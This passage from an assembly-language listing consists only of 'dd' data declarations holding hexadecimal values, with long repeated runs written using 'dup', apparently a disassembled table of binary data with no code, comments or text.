dd 41032303h, 1C03E804h, 5D03E204h, 0FF045D04h, 3F047A03h
dd 3E03E604h, 1043F04h, 75045D04h, 0B7047A04h, 5D043304h
dd 74047A04h, 7A032B04h, 20045D04h, 5003C304h, 3F040104h
dd 3F043E04h, 16043F04h, 0A5047A04h, 5D051303h, 0E2042004h
dd 3F042003h, 7A043F04h, 1042004h, 5D045D04h, 7A03E304h
dd 7A03C304h, 92045D04h, 20041E04h, 3F043F04h, 0C3040104h
dd 5D042003h, 7A03C104h, 43038704h, 0E2040204h, 3E036A03h
dd 5D041E04h, 7A03C504h, 20040004h, 5D040004h, 3E03E004h
dd 5D040004h, 3F042004h, 3E03E104h, 3F03C104h, 3F040004h
dd 7A03FF04h, 7A03E004h, 7A043F04h, 6C040004h, 5D03A304h
dd 5D03E004h, 7A040004h, 55040004h, 3D03A304h, 0C203F004h
dd 5D040003h, 2 dup(20040004h), 0FC042004h, 2004B004h
dd 1E03E004h, 0E2042004h, 3F042003h, 0C1040004h, 0A3040003h
dd 5702EC04h, 0DF042004h, 0B302BF03h, 1E042003h, 2 dup(20040004h)
dd 3F03C104h, 0FF03E004h, 0E2040003h, 3F042003h, 1040004h
dd 3F042004h, 7A03C104h, 2003E004h, 5D040004h, 7A043E04h
dd 20040004h, 3F03E104h, 5D040004h, 72040004h, 3F042004h
dd 3F03E004h, 0FF03E004h, 3F040003h, 20040004h, 3F03E004h
dd 3F036A04h, 5D042004h, 20040004h, 7A03A304h, 3E040004h
dd 3AF04h, 0C04A104h, 0AC055405h, 0F1041804h, 2F03FD04h
dd 5D03E004h, 7A040004h, 0E003FF04h, 3F03E303h, 40104h
dd 3F042004h, 42004h, 0E0043F04h, 3E003h, 3FF04h, 0E0040004h
dd 0E0040103h, 20040003h, 40004h, 0E0040004h, 0E003E003h
dd 40003h, 2 dup(40004h), 20040004h, 2 dup(40004h), 0E003E004h
dd 3E003h, 40004h, 3E004h, 42004h, 10h dup(40004h), 0E0040004h
dd 40003h, 0Bh dup(40004h), 0E0040004h, 40003h, 42h dup(40004h)
dd 0F101E804h, 0A039502h, 35040304h, 6A037A03h, 2003C203h
dd 0E203E204h, 103A303h, 0E0041A04h, 42003h, 2003C104h
dd 40004h, 0A3040004h, 1042003h, 3E004h, 0E003E004h, 1040003h
dd 20042004h, 2 dup(40004h), 20042004h, 0E0040004h, 40003h
dd 3F040004h, 40004h, 45D04h, 5 dup(40004h), 20040004h
dd 40004h, 42004h, 20040004h, 8 dup(40004h), 3E004h, 2Ah dup(40004h)
dd 42004h, 2Ah dup(40004h), 2B047B04h, 0B1049B03h, 0A033503h
dd 65040A06h, 0EC04D505h, 5804A603h, 2B03D305h, 7602E605h
dd 8A051E04h, 0D9051603h, 0C7048C03h, 0F4059603h, 44F02h
dd 2038604h, 0E0045D05h, 5B03C603h, 0EA039604h, 0A1043E04h
dd 0E8049804h, 43047604h, 0BD043204h, 7603FC03h, 0FE04C903h
dd 5503C103h, 0A704A604h, 0FF03FF03h, 0C103A303h, 6D03A903h
dd 1E040104h, 20040004h, 3D043F04h, 0D03E604h, 0B104B104h
dd 1404AF04h, 0CB04E405h, 8A045D04h, 13040204h, 8C03AF05h
dd 0E3040204h, 303E203h, 0F0047A04h, 0C4048C04h, 0C6038B03h
dd 23047403h, 9045603h, 1304CC05h, 7A054303h, 21047A04h
dd 8A043F04h, 2004CB03h, 20043F04h, 3F042004h, 20040104h
dd 2003E204h, 20043F04h, 92038604h, 20038603h, 3F042004h
dd 42004h, 20040004h, 0FF040004h, 0C5040003h, 8603E003h
dd 2103E003h, 36A04h, 0B1040004h, 0C9040004h, 41041F04h
dd 0FC043F05h, 9603E004h, 7A040004h, 0FC042004h, 0E2047A04h
dd 2E03E103h, 0C503E105h, 3E03A303h, 3F03DF04h, 103C104h
dd 20045D04h, 2003FF04h, 7403E204h, 4103FF04h, 1042004h
dd 7A03E004h, 5B040104h, 3F03EB04h, 20038604h, 8E042004h
dd 0F5034B03h, 67048E04h, 66047A04h, 76039404h, 46033204h
dd 7A03C204h, 1F040004h, 5D03E004h, 103A304h, 0A9040004h
dd 0E602EC03h, 20040003h, 1F040004h, 20042004h, 20040004h
dd 0FF040004h, 20040003h, 20042004h, 20040004h, 2003C104h
dd 1040004h, 20040004h, 40004h, 0C1043D04h, 3C103h, 20043E04h
dd 0E0040004h, 0FF040003h, 20040003h, 2 dup(40004h), 20040004h
dd 40004h, 20040004h
dd 3E004h, 20040004h, 0E003A304h, 3C103h, 3F043F04h, 3A304h
dd 9071004h, 9504E407h, 0FC050006h, 83040003h, 1E03C303h
dd 5D051304h, 43F04h, 86040004h, 20041303h, 0FF049604h
dd 0D904B103h, 103E003h, 40004h, 42004h, 40004h, 42004h
dd 4F03C104h, 3E003h, 96040004h, 0E003C104h, 8603E003h
dd 40003h, 3C504h, 20040004h, 6 dup(40004h), 0E0040004h
dd 40003h, 5 dup(40004h), 0E3040004h, 40003h, 5 dup(40004h)
dd 41E04h, 3C104h, 40004h, 0E0040004h, 40003h, 1Ah dup(40004h)
dd 0C1040004h, 40003h, 0Bh dup(40004h), 0E0040004h, 40003h
dd 26h dup(40004h), 7A04F604h, 0AC040102h, 6A018C02h, 9B03E003h
dd 8C03B202h, 55603h, 3E204h, 0A303E004h, 40103h, 0E003C104h
dd 8B040003h, 0E0040003h, 1040003h, 42004h, 2 dup(40004h)
dd 2 dup(20042004h), 2 dup(40004h), 3F040004h, 20040004h
dd 2003E104h, 40004h, 42004h, 40004h, 20042004h, 11h dup(40004h)
dd 20040004h, 2Bh dup(40004h), 20040004h, 27h dup(40004h)
dd 0C9033504h, 0B9025F03h, 7B035103h, 0D6058205h, 6B028604h
dd 5D044903h, 0AE03E405h, 0EE01E104h, 94039005h, 8E053604h
dd 1903A704h, 0D103B903h, 0A4036A03h, 0E7038C03h, 0E003B804h
dd 0CA03CE03h, 103E104h, 5403C904h, 9D039B04h, 204BB04h
dd 5003E004h, 5B040104h, 86054504h, 58040203h, 2004B504h
dd 0E0043B04h, 0E003FF03h, 0F703A903h, 2D04A804h, 4CC04h
dd 0AA042004h, 0F6038C03h, 0E0046E04h, 1043F03h, 5D043F04h
dd 0D5045C04h, 0FE047004h, 20037403h, 0C5043E04h, 7A043F04h
dd 20047A04h, 87043F04h, 72045D03h, 3C043E04h, 0E7042004h
dd 0E2043F03h, 5304CB03h, 94040004h, 0EC040104h, 20045D02h
dd 3F040004h, 3FF04h, 3F03E004h, 40104h, 0E003E004h, 0A8043F03h
dd 74035F04h, 0C203C504h, 0D503C303h, 38602h, 0E0040004h
dd 86040003h, 0C3031C03h, 21032703h, 4040104h, 43F04h
dd 3F03E004h, 20040004h, 3F042004h, 20040004h, 0C3040004h
dd 1403E003h, 3F040105h, 103C104h, 1040104h, 49049204h
dd 67045C04h, 0AC03E003h, 5D040104h, 0FF042004h, 0C1040003h
dd 20040003h, 0C1040004h, 20040003h, 0E2036A04h, 1E040003h
dd 86042004h, 86040103h, 0C1043F03h, 0CB03E003h, 0FF04E404h
dd 20040003h, 0DE040104h, 96040003h, 0E2040104h, 0FE041E03h
dd 0C103E003h, 3C103h, 0A3031E04h, 20040003h, 40004h, 1F040004h
dd 0E0042004h, 42003h, 40004h, 1042004h, 20040004h, 3E004h
dd 40004h, 3E004h, 0E2042004h, 0D5042003h, 1037404h, 86047504h
dd 2003E003h, 1042004h, 20047A04h, 45D04h, 2D504h, 38604h
dd 2 dup(40004h), 3E004h, 40004h, 38604h, 0FF046E04h, 20038603h
dd 34104h, 45060C04h, 0A303A305h, 3C103h, 41E04h, 42004h
dd 3E004h, 57040004h, 2 dup(40004h), 56204h, 40004h, 42004h
dd 40004h, 7A040004h, 40004h, 42004h, 2 dup(40004h), 0A903E004h
dd 8 dup(40004h), 0A3040004h, 40003h, 40004h, 0E0040004h
dd 40003h, 5 dup(40004h), 0E1040004h, 42003h, 7 dup(40004h)
dd 42004h, 1Ch dup(40004h), 0E0040004h, 3E003h, 0Fh dup(40004h)
dd 0E0040004h, 40003h, 22h dup(40004h), 0E602BD04h, 7102A703h
dd 3C102h, 47604h, 24804h, 3E004h, 40004h, 3E004h, 0E0040004h
dd 43F03h, 8 dup(40004h), 5C040004h, 3 dup(40004h), 0E0040004h
dd 40003h, 3 dup(40004h), 20040004h, 9 dup(40004h), 20040004h
dd 26h dup(40004h), 20042004h, 33h dup(40004h), 9504AC04h
dd 0D802CB04h, 4A054105h, 63023B04h, 23037905h, 7D03C304h
dd 3A031905h, 6E03D203h, 0B045704h, 0A803A205h, 0AD057F04h
dd 0C304A003h, 3A043F03h, 0D003FE04h, 8E032703h, 0A6041403h
dd 0F5041803h, 0B903D703h, 0BD042004h, 0F504F904h, 0EF02B603h
dd 2903A903h, 5C03BF04h, 0FC036A03h, 0E1049404h, 3F03E003h
dd 1B03FF04h, 2003B104h, 0E203A904h, 0A6044703h, 4A046F03h
dd 0DC03FB04h, 0A904E504h, 21052104h, 3B049404h, 0D704B104h
dd 0FF045D04h, 6C03E003h, 6703FF04h, 3203FF03h, 9F050804h
dd 77047904h, 0E403F103h, 84054104h, 0A5048C04h, 0E0036F04h
dd 0E0050B03h, 22038E03h, 88040004h, 20045D03h, 3FF04h
dd 0C203E004h, 0A303FF03h, 1E043F03h, 2003C204h, 1E03C304h
dd 0FF043F04h, 2003E603h, 0E3045D04h, 0CA047A04h, 12054104h
dd 9904EC04h, 0B053005h, 0F704F905h, 2B03C103h, 0C503E205h
dd 0A03A304h, 7A03E005h, 3A045D04h, 5D03E004h, 78042004h
dd 0FC040004h, 1F03E004h, 20040004h, 3E004h, 3D03E004h
dd 2003FE04h, 5D03FF04h, 0E0037304h, 0C5042003h, 46042303h
dd 0AF043F03h, 0DD03A303h, 0A103F603h, 4604B804h, 0C003C205h
dd 4C040003h, 6C040003h, 0C403C103h, 0B1042003h, 1F042003h
dd 3F043F04h, 1E03E004h, 3E004h, 20042004h, 1E03E104h
dd 38604h, 0C1040004h, 0A303C403h, 20040003h, 0E0040004h
dd 42003h, 40004h, 0E003E004h, 1041F03h, 3FF04h, 103E104h
dd 1F040004h, 0E0043F04h, 3F045D03h, 3F042004h, 3F043F04h
dd 3F03E004h, 20040004h, 2 dup(3F03E004h), 7A042004h, 5803E004h
dd 96042004h, 0FC042004h, 41043F04h, 0FC040005h, 2B037604h
dd 0CA043F05h, 6B043F05h, 6203FF05h, 5603A505h, 38E05h
dd 1E056C04h, 33049F06h, 0E0051405h, 38038503h, 7A042005h
dd 40004h, 0E0049604h, 0AF037303h, 0E0040003h, 0C1048003h
dd 43F03h, 43F04h, 1E040004h, 3E004h, 7A03FF04h, 5D03D704h
dd 3A304h, 40004h, 3B040004h, 43F04h, 3F040004h, 40004h
dd 0FF040004h, 40003h, 4 dup(40004h), 0E0040004h, 0E0040003h
dd 8603A303h, 20033503h, 5 dup(40004h), 0C1040004h, 103FF03h
dd 2 dup(40004h), 0E0040004h, 40003h, 9 dup(40004h), 3E004h
dd 0Ah dup(40004h), 0E0041F04h, 40003h, 0Bh dup(40004h)
dd 0E003E004h, 0E003E003h, 40003h, 5 dup(40004h), 3E004h
dd 7 dup(40004h), 3E004h, 21h dup(40004h), 0E0040004h
dd 3E003h, 81004204h, 0BF00B402h, 7203E102h, 15103h, 0C502BF04h
dd 3E203h, 0C103E004h, 0A4026403h, 40003h, 3F03E204h, 43F04h
dd 40004h, 0FF040004h, 40003h, 6A040004h, 2A203h, 42004h
dd 40004h, 0A3040004h, 40003h, 5 dup(40004h), 0C1040004h
dd 42003h, 2 dup(40004h), 5D040004h, 5D043F04h, 103E404h
dd 5 dup(40004h), 0E0040004h, 3E003h, 2 dup(40004h), 0E0040004h
dd 40003h, 2 dup(40004h), 0E0040004h, 40003h, 5 dup(40004h)
dd 42004h, 0Ah dup(40004h), 3E204h, 42004h, 3Dh dup(40004h)
dd 20040004h, 42004h, 8D055C04h, 38054501h, 3F05C004h
dd 88032705h, 6F02D505h, 9F055400h, 2302A206h, 61033904h
dd 0E303C203h, 93044403h, 1506E404h, 9D051C01h, 0CB03FF01h
dd 0AD031204h, 0B303FD04h, 1902E803h, 1F032A04h, 72039A04h
dd 57041404h, 0F604A705h, 0B6030503h, 0C1036003h, 26073C03h
dd 0E403C403h, 0E105D304h, 57042003h, 72040004h, 94035E04h
dd 3E041E04h, 0A4041F04h, 1E04BF03h, 90026304h, 7A047804h
dd 0FF040104h, 0E0047A03h, 4F049503h, 14047A04h, 0D5040604h
dd 9E03E002h, 3B049603h, 0BA052C04h, 0FE03BB04h, 8B00E403h
dd 0FE034804h, 4D046803h, 3503C105h, 1F057F03h, 1045704h
dd 0C0040004h, 0E004FC02h, 3F040103h, 0E2042004h, 40103h
dd 20040004h, 1F042004h, 0A502D504h, 3F03C103h, 7A042004h
dd 5D043F04h, 7A043F04h, 0CF047904h, 1E042003h, 2003C104h
dd 74036B04h, 9603E004h, 0B1042004h, 5D043F04h, 3F033504h
dd 1040104h, 20040004h, 7603C104h, 96042004h, 0FF03C104h
dd 0C2040003h, 5D03A303h, 3F03E204h, 2AA04h, 0E203E004h
dd 0E303A303h, 0D5040003h, 9A034F03h, 43041F03h, 0E003C103h
dd 7803E403h, 32021D05h, 0EC047704h, 4F038602h, 0A3043803h
dd 8E03A303h, 0A6043F03h, 5CA06h, 3C104h, 6044F04h, 1040004h
dd 0C3042004h, 3D042003h, 38604h, 12040004h, 4021803h
dd 40003h, 0E003E004h, 0C103E003h, 20040003h, 1040004h
dd 0E003A304h, 42003h, 40004h, 20040004h, 20043F04h, 5D040004h
dd 3C104h, 1045B04h, 3E204h, 0FF03C104h, 20040003h, 3E040004h
dd 1040004h, 5D040004h, 3F040004h, 7A040004h, 96040004h
dd 0E203E004h, 20036A03h, 3F040004h, 3E004h, 2003C104h
dd 7A040004h, 2BF04h, 3E068A04h, 95047404h, 7605BE04h
dd 21038604h, 1A043B04h, 96043F04h, 40004h, 45D04h, 0FF042004h
dd 1E040003h, 58B04h, 0A3045D04h, 40003h, 40004h, 5D040004h
dd 40004h, 0E0040004h, 0E0040003h, 40003h, 3E004h, 8D042004h
dd 40003h, 43F04h, 40004h, 43F04h, 4 dup(40004h), 0E0040004h
dd 40003h, 9 dup(40004h), 20040104h, 1040004h, 4 dup(40004h)
dd 45D04h, 40004h, 0E0040004h, 40003h, 1Eh dup(40004h)
dd 0E0040004h, 40003h, 40004h, 0E0040004h, 40003h, 3A304h
dd 2Ah dup(40004h), 1B040204h, 1E02C101h, 3E804h, 0E003A904h
dd 8703E003h, 3A302h, 0E0040004h, 0E2040103h, 0E0040003h
dd 3D03E003h, 0C103C104h, 0C1040003h, 40003h, 40004h, 20042004h
dd 3E004h, 43F04h, 40004h, 42004h, 0C1040004h, 1B040003h
dd 3FF04h, 0A3040004h, 40003h, 5 dup(40004h), 3F040004h
dd 40004h, 3E004h, 0Ah dup(40004h), 3C504h, 42004h, 3F040004h
dd 3 dup(40004h), 20040004h, 0Eh dup(40004h), 3E004h, 11h dup(40004h)
dd 20040004h, 0Ah dup(40004h), 5D040004h, 22h dup(40004h)
dd 42004h, 0E047C04h, 0B3040405h, 0C103B505h, 9C037803h
dd 5203C205h, 20040504h, 73043805h, 0A702EF04h, 8E046406h
dd 0D3037103h, 0E0038503h, 0F904AC03h, 0B903A602h, 0AA03A303h
dd 10030403h, 0F1039104h, 0B504F005h, 88049E04h, 0E7034105h
dd 0E1045204h, 0AA04CE03h, 303FE04h, 0A9032204h, 9E04B005h
dd 0E105B104h, 0B4043D03h, 60045A04h, 4B04B404h, 5D043904h
dd 49041D04h, 1E046E04h, 0BC030904h, 99050404h, 0E6047A04h
dd 91045704h, 4E043C04h, 17044306h, 2503A605h, 7B043A04h
dd 8C044504h, 0EB04B804h, 0C3049604h, 88047904h, 0F048504h
dd 43053005h, 0C4036505h, 9806CB02h, 7D04F505h, 0C2045904h
dd 7A045D03h, 1A049604h, 0BD049604h, 0DE047A04h, 0CB04CB04h
dd 2B045D04h, 14047A05h, 2B049505h, 9604E405h, 0FC043F04h
dd 9204AD04h, 0CB047A04h, 78045D04h, 3D045B04h, 2003FA04h
dd 77047504h, 0B803F805h, 1E045C04h, 7F03E004h, 0CB03E105h
dd 0BF041E04h, 3B042004h, 0F1043F04h, 96042005h, 3803A304h
dd 5D03E004h, 3F04FF04h, 3D03E604h, 8E03C104h, 96041804h
dd 7003FF04h, 91041F04h, 0CB043F04h, 5703C104h, 14040004h
dd 9603E205h, 0A9042004h, 96041E04h, 0F4043E04h, 0AF029802h
dd 0B3041603h, 9F040C03h, 0F1044804h, 0F504C605h, 23041A05h
dd 14047A04h, 0B1042005h, 3E03C304h, 3F03E004h, 3B031A04h
dd 7A03E004h, 96040004h, 7A040004h, 96041E04h, 1E040004h
dd 7A03C104h, 0FC040004h, 0CB03E004h, 94040004h, 5D040004h
dd 0FC040004h, 7A040004h, 14040004h, 0B1040005h, 0BF03E004h
dd 0AD040004h, 96040004h, 3F040004h, 0FC040004h, 0CB040004h
dd 0B1042004h, 7A042004h, 0CB040004h, 5D040004h, 72040004h
dd 96040104h, 7A040104h, 0C5043F04h, 37804h, 0E8063D04h
dd 0E304BC05h, 0E704D804h, 0EB047904h, 3C047804h, 4F043904h
dd 0E2040004h, 0A603C103h, 0C2045904h, 20042003h, 603E004h
dd 0E0045B04h, 3E003h, 42004h, 40004h, 3F03E004h, 0FF040004h
dd 2 dup(0E0040003h), 40003h, 40004h, 3E004h, 0C1040004h
dd 40003h, 42004h, 6 dup(40004h), 0FF03E004h, 43F03h, 0Bh dup(40004h)
dd 40104h, 3E004h, 2 dup(40004h), 20040004h, 0Eh dup(40004h)
dd 0E0040004h, 0C1040003h, 40003h, 16h dup(40004h), 0E0040004h
dd 40003h, 25h dup(40004h), 3E004h, 0AF029204h, 0CE039902h
dd 3A022303h, 0EC03FC04h, 0C7040603h, 0E2045303h, 5D041F03h
dd 1E03A304h, 20042004h, 7A040104h, 20041F04h, 5703E004h
dd 42004h, 20040004h, 40004h, 0C103C104h, 1042003h, 2 dup(40004h)
dd 20042004h, 40004h, 1040004h, 3F03A304h, 42004h, 2 dup(40004h)
dd 20040004h, 4 dup(40004h), 3F03E004h, 40004h, 20040004h
dd 42004h, 0Ah dup(40004h), 43F04h, 11h dup(40004h), 3E004h
dd 21h dup(40004h), 20040004h, 1Eh dup(40004h), 2D065404h
dd 3301F107h, 92042A06h, 7C032704h, 7803F305h, 0C004E704h
dd 40040304h, 0B3034503h, 55054D03h, 9C043005h, 14036E04h
dd 45060504h, 1E042104h, 9E045B04h, 0F4033203h, 0A9047303h
dd 0D204A602h, 1A045B03h, 5303EF05h, 9B050C05h, 70033B04h
dd 4C037D04h, 8D050A03h, 9004D804h, 20045B03h, 1E03C104h
dd 3B040104h, 7A03E004h, 20036E04h, 88035404h, 0C1038B03h
dd 0B1035D03h, 2003C303h, 8804E105h, 6603EA04h, 0F7041604h
dd 95043204h, 26038704h, 0A2043F04h, 4F041D03h, 5D043C04h
dd 3C904h, 72038604h, 0B7043A04h, 9205BD04h, 4202AE05h
dd 0C9050B03h, 3F03E004h, 0C2043904h, 0C1042003h, 3E003h
dd 0FF03C104h, 2003E003h, 1E03E004h, 42004h, 3F03E004h
dd 0FF040004h, 5D047A03h, 7A045D04h, 3B049F04h, 2046A04h
dd 9604B004h, 96049E04h, 3A051F04h, 0C2039104h, 58034303h
dd 19046705h, 0A503E305h, 0D8045E04h, 31043C04h, 2D03A404h
dd 0F6040104h, 55042604h, 90036B04h, 0E1045D03h, 63046A03h
dd 0E4040603h, 0FA03E103h, 0C304BD03h, 0A703E103h, 1E03DE04h
dd 20045D04h, 2040004h, 3E03C504h, 43F04h, 0A403C204h
dd 72042003h, 5D03A704h, 0FE037A02h, 97044501h, 9D047A02h
dd 0F5028104h, 0B1035404h, 8A045A04h, 0E003FF03h, 3F03C103h
dd 0C5040004h, 0E0040103h, 2003E103h, 40004h, 43F04h, 3E004h
dd 40004h, 0E0040104h, 42003h, 2003E004h, 40004h, 3F042004h
dd 20042004h, 2 dup(40004h), 0E003E004h, 42003h, 0E0040004h
dd 5D03E003h, 5D03E004h, 5D040004h, 7A040004h, 76040004h
dd 5D043F04h, 7203E004h
dd 103C104h, 9403C104h, 8E042004h, 0FC043F04h, 5D045D04h
dd 0D040004h, 3E005h, 0B5075004h, 8603E206h, 47606h, 8803FD04h
dd 1F044F05h, 40204h, 3F040004h, 0C5042004h, 1041F03h
dd 3F043F04h, 0FE040004h, 3FF03h, 2 dup(40004h), 20042004h
dd 0C103FF04h, 0E0036A03h, 0A3042003h, 0C1040003h, 40003h
dd 2 dup(40004h), 0E0040004h, 40003h, 4 dup(40004h), 0E0040004h
dd 40003h, 0E0040004h, 3A303h, 60h dup(40004h), 9902DA04h
dd 0BE01F404h, 2002AE03h, 0A1032804h, 1048604h, 43D04h
dd 0E0040004h, 0E6036603h, 3E003h, 42004h, 3F042004h, 42004h
dd 40004h, 1040004h, 40004h, 0FF03E704h, 1045D03h, 42004h
dd 40004h, 3F040004h, 40004h, 3F040004h, 20042004h, 5 dup(40004h)
dd 42004h, 20040004h, 40004h, 2 dup(42004h), 40004h, 2003E004h
dd 22h dup(40004h), 42004h, 3Ah dup(40004h), 35041C04h
dd 0C401D703h, 0FF046C04h, 21049604h, 8702B305h, 69028305h
dd 56027405h, 5F01DF05h, 0F703CE05h, 0BC042E04h, 0AE048A04h
dd 403AB04h, 9602F105h, 7E032604h, 2F02AF05h, 94033403h
dd 45040E03h, 0E9037104h, 8704EE03h, 202C002h, 26030702h
dd 0D402A403h, 31046702h, 0F025902h, 3B035002h, 0C1032F03h
dd 0A9037503h, 3B02D803h, 2004D504h, 26052704h, 88045304h
dd 0A604AC04h, 0E3040105h, 8E048704h, 5D049104h, 7C050404h
dd 16051F04h, 96045D04h, 37055104h, 3057D04h, 0F059204h
dd 0C8050005h, 0B104A904h, 5B04F504h, 3D04C404h, 78047004h
dd 16058304h, 1905C404h, 38066104h, 1F05A404h, 4F047204h
dd 0C9053104h, 2004FA03h, 0A503A304h, 0FC04A104h, 7304D404h
dd 9303DB03h, 0A604A505h, 903FF03h, 8E03FF05h, 66043D04h
dd 8304F704h, 48041205h, 3F030A05h, 4103FF04h, 0E204CB05h
dd 51040104h, 6C03FF04h, 19040204h, 21043F04h, 0CC040104h
dd 0AF03FF03h, 5D041F04h, 7203E003h, 1E03DF04h, 96040004h
dd 0C4040004h, 0C503C103h, 4C043D03h, 0B103FF03h, 40038E04h
dd 7E048902h, 2F03E004h, 30049603h, 29041E04h, 40304h
dd 45040004h, 0C2038603h, 1503E003h, 7A043D03h, 7403C204h
dd 9603FF04h, 0F5042004h, 0A703E402h, 8A03FE03h, 95041A02h
dd 0F103C704h, 58043F02h, 9F041A04h, 3F042002h, 0DF042004h
dd 0FF045D03h, 0AF03E003h, 1F042003h, 96042004h, 3F03E003h
dd 3F03E004h, 0E0045904h, 0E6042003h, 0D903E003h, 0ED042004h
dd 38042002h, 4A03AE05h, 6004B405h, 94040004h, 3F042004h
dd 1E041C04h, 5D03E204h, 3F042105h, 72043E04h, 7A042004h
dd 0CB043F04h, 1403CB04h, 2C03E005h, 8C03FF05h, 4D04B104h
dd 5C042005h, 3A904h, 6B051C04h, 65055F04h, 5A04E804h
dd 0FE03F004h, 1403FE03h, 1F03FF04h, 4F03FF04h, 0FF03AD04h
dd 0E0043F03h, 0FF03E003h, 3FF03h, 0FF03E004h, 40003h
dd 3F040004h, 3E004h, 0E0033504h, 3F040003h, 3E004h, 0E003E004h
dd 40003h, 0E0040004h, 40003h, 3A304h, 3E004h, 3 dup(40004h)
dd 20040004h, 3E004h, 40004h, 42004h, 3E204h, 40004h, 0E0040004h
dd 40003h, 5 dup(40004h), 43F04h, 7 dup(40004h), 42004h
dd 7 dup(40004h), 3E004h, 3 dup(40004h), 0E0040004h, 40003h
dd 6 dup(40004h), 3E004h, 0Bh dup(40004h), 0E0040004h
dd 40003h, 2Eh dup(40004h), 34021404h, 74017702h, 0F703BB03h
dd 0C102E203h, 0A303A303h, 3B03C103h, 0C1041F04h, 30903h
dd 0E003E004h, 3F040003h, 0A303FF04h, 40103h, 1F042004h
dd 1E040104h, 1042004h, 41E04h, 3 dup(40004h), 0A3040004h
dd 40003h, 42004h, 40004h, 1040004h, 2 dup(40004h), 42004h
dd 0E0042004h, 40003h, 4 dup(40004h), 0E0040004h, 40003h
dd 5 dup(40004h), 42004h, 0Eh dup(40004h), 20040004h, 6 dup(40004h)
dd 20040004h, 11h dup(40004h), 20040004h, 0Fh dup(40004h)
dd 20040004h, 1Fh dup(40004h), 9504A304h, 0F0039503h, 0A5047204h
dd 8804C104h, 41038603h, 9A047D04h, 99046004h, 8B03F304h
dd 0A3042004h, 1603D503h, 2B03EE04h, 0A5038603h, 9C03E603h
dd 30041A03h, 3903A704h, 3C038C03h, 0FC03A304h, 0E0040103h
dd 0C3043F03h, 0FD03FF03h, 8B040403h, 0C7048C03h, 0E2049C03h
dd 0DF045C03h, 1F03C303h, 7A040104h, 0A3045304h, 90043F03h
dd 5D03C504h, 0E0040604h, 0E0046E03h, 1D033503h, 45D04h
dd 6A042004h, 5C045703h, 3FF04h, 0A3042004h, 0FF03E003h
dd 1E03A303h, 0C1045D04h, 0FF043D03h, 0FF03FF03h, 3F040203h
dd 1042004h, 0C03C104h, 0C1045D04h, 0C1045D03h, 0C103C103h
dd 0A3041E03h, 3F049603h, 0FF03C204h, 0FF043F03h, 96040003h
dd 3C104h, 3F045D04h, 1B040004h, 3E03FF04h, 20036A04h
dd 1E040004h, 45D04h, 86042004h, 20040103h, 3C104h, 20036C04h
dd 0E203C104h, 40003h, 3F040004h, 3E004h, 3B03E604h, 0FF03E004h
dd 0C1042003h, 43F03h, 20040004h, 40004h, 3E004h, 20042004h
dd 3E004h, 3F045D04h, 5D042004h, 20040004h, 5D041F04h
dd 3F03E004h, 0C103C104h, 20040103h, 20042004h, 0C1042004h
dd 20040103h, 20040004h, 20042004h, 96045D04h, 5D041F04h
dd 40004h, 0E2043F04h, 3F040003h, 2 dup(43F04h), 103FF04h
dd 42004h, 1E041E04h, 5D040004h, 0E003E004h, 20045D03h
dd 3F042004h, 0FF040004h, 43F03h, 0B1040004h, 42004h, 43F04h
dd 5D040004h, 1040004h, 40004h, 7A040004h, 20045D04h, 20043F04h
dd 42004h, 0C1049604h, 42003h, 1040004h, 5D03E004h, 40004h
dd 2 dup(20040004h), 20036A04h, 0E003E004h, 40003h, 3C104h
dd 0E0040004h, 38C03h, 9F054604h, 0FA041703h, 70040103h
dd 43B04h, 0E003E004h, 43B03h, 3F045D04h, 2 dup(3E004h)
dd 42004h, 2 dup(40004h), 45D04h, 20040004h, 8 dup(40004h)
dd 42004h, 40004h, 0C1040004h, 40003h, 12h dup(40004h)
dd 0E0040004h, 40003h, 0Ah dup(40004h), 3E004h, 47h dup(40004h)
dd 0D02EA04h, 0C103A703h, 0A7031C03h, 0A303E003h, 0E003E003h
dd 8A03C303h, 20042003h, 40004h, 40104h, 40004h, 1F042004h
dd 42004h, 0E1043F04h, 0E0040003h, 40003h, 2 dup(40004h)
dd 42004h, 20040004h, 4 dup(40004h), 42004h, 20040004h
dd 40004h, 43F04h, 0E0040004h, 42003h, 63h dup(40004h)
dd 0BC045C04h, 0B6041E04h, 9D042C03h, 96039404h, 73037804h
dd 5104A503h, 20041F04h, 5D03C904h, 8803CB04h, 5C045D03h
dd 0E0039E04h, 0E203E003h, 20038603h, 203C104h, 86041E04h
dd 1803C103h, 0E003A904h, 20043F03h, 8C041E04h, 0FE040204h
dd 0FE042003h, 0FF045A03h, 0E0045C03h, 0E1043F03h, 47A03h
dd 0FF03C204h, 3E003h, 3F03FF04h, 0C1043F04h, 42003h, 0C103FF04h
dd 0FF040103h, 0E0042003h, 20043D03h, 1F03C104h, 0E0042004h
dd 0E0040003h, 8603FF03h, 3F03E003h, 1043F04h, 20043F04h
dd 1F040004h, 5D03C104h, 2 dup(3F043F04h), 3E004h, 3F042004h
dd 0E0040004h, 8603FF03h, 40003h, 20040004h, 0E0042004h
dd 42003h, 3E004h
dd 0E0040004h, 3F042003h, 3F040004h, 40004h, 20043F04h
dd 40004h, 0FF040004h, 3C103h, 0FF03FF04h, 3F03C103h, 0FF03C104h
dd 42003h, 0E0042004h, 2003E003h, 40004h, 103C104h, 2003E004h
dd 40004h, 3E004h, 20040004h, 20043F04h, 20042004h, 42004h
dd 0FF042004h, 1040003h, 20040004h, 3F03E004h, 0E0040004h
dd 40003h, 3F040004h, 42004h, 0FF040104h, 103E003h, 3F040004h
dd 1040004h, 5D040004h, 2 dup(42004h), 20040004h, 1040004h
dd 2 dup(40004h), 2003E004h, 42004h, 3C104h, 2 dup(40004h)
dd 20040004h, 0FF040004h, 3E003h, 2003E004h, 2 dup(40004h)
dd 3E004h, 2 dup(40004h), 20042004h, 3F040004h, 40004h
dd 0C1040004h, 40003h, 40004h, 1040004h, 20040004h, 3 dup(40004h)
dd 0E0040004h, 3C103h, 43F04h, 20040004h, 0E0042004h, 42003h
dd 3FF04h, 1E04A804h, 3F03E004h, 47A04h, 20040004h, 3 dup(40004h)
dd 0E0042004h, 40003h, 40004h, 42004h, 0Ah dup(40004h)
dd 42004h, 8 dup(40004h), 42004h, 0Bh dup(40004h), 20040004h
dd 11h dup(40004h), 0E0040004h, 40003h, 17h dup(40004h)
dd 0E0040004h, 40003h, 29h dup(40004h), 4F043D04h, 3C103h
dd 43F04h, 0E0040104h, 0C3040003h, 40003h, 2 dup(40004h)
dd 42004h, 40004h, 3FF04h, 3 dup(40004h), 0E0040004h, 40003h
dd 4 dup(40004h), 20040004h, 6Bh dup(40004h), 79047704h
